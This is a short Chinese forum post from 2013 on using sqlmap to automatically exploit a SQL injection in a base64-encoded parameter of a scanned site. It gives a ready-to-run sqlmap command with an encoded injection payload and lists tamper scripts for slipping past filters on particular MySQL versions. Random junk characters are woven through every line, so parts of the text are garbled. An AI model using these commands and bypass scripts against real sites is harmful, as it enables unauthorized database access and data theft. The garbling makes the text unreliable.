WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
& r2 z+ y3 g2 V# ]4 X4 L. \2 @0 i8 r7 y5 _ l
sqlmap的tamper里有个base64encode.py5 o( O$ e1 @1 q# G' V
3 [0 O% f- v8 `, ^) h, F
使用如下
& X; `9 u5 }7 c$ g6 Z8 ?
. K7 q2 A$ Y* q- p1 V6 K; Psqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
2 W" `# p" H d5 u" f; }: l' m' }2 a
, D) x% ?& B) G# asqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”% g D/ H9 w- o+ Z3 @% v% N5 D
2 H P: y [/ A( j3 O/ F0 @
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
: {& W; R2 a# _! ^' T
: k2 o; e( c# b; Zspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
% k7 F9 b9 I- B6 e$ wspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入9 s, @/ u* _# U, Q
首先确定目标数据库版本,然后选择相应的脚本。) s1 y2 A, o5 ?# Z, d9 W
-v 3 --batch --tamper "space2hash.py"
" p$ A( N7 }. I* v0 T2 i+ t( P8 r7 W2 d5 R: [- \1 I
还有其他一些插件:1 V7 n" M: z1 V2 @
encodes编码 ——charencode.py3 l# O9 G* |/ M; m o& I
base64编码 —— base64encode.py2 G: B* V4 K9 V4 l7 v( f
替换空格和关键字 —— halfversionedmorekeywords.py
( c+ M2 i- X0 ? |
' X' }0 _- q( Y( M1 g; b3 k# g
# y) Q! d0 Y: f4 a0 }0 n2 o: C* ^* ]' [( U
/ U [4 N S* w6 d& t$ s |
发表于 2013-11-23 15:50:45
收藏
支持
反对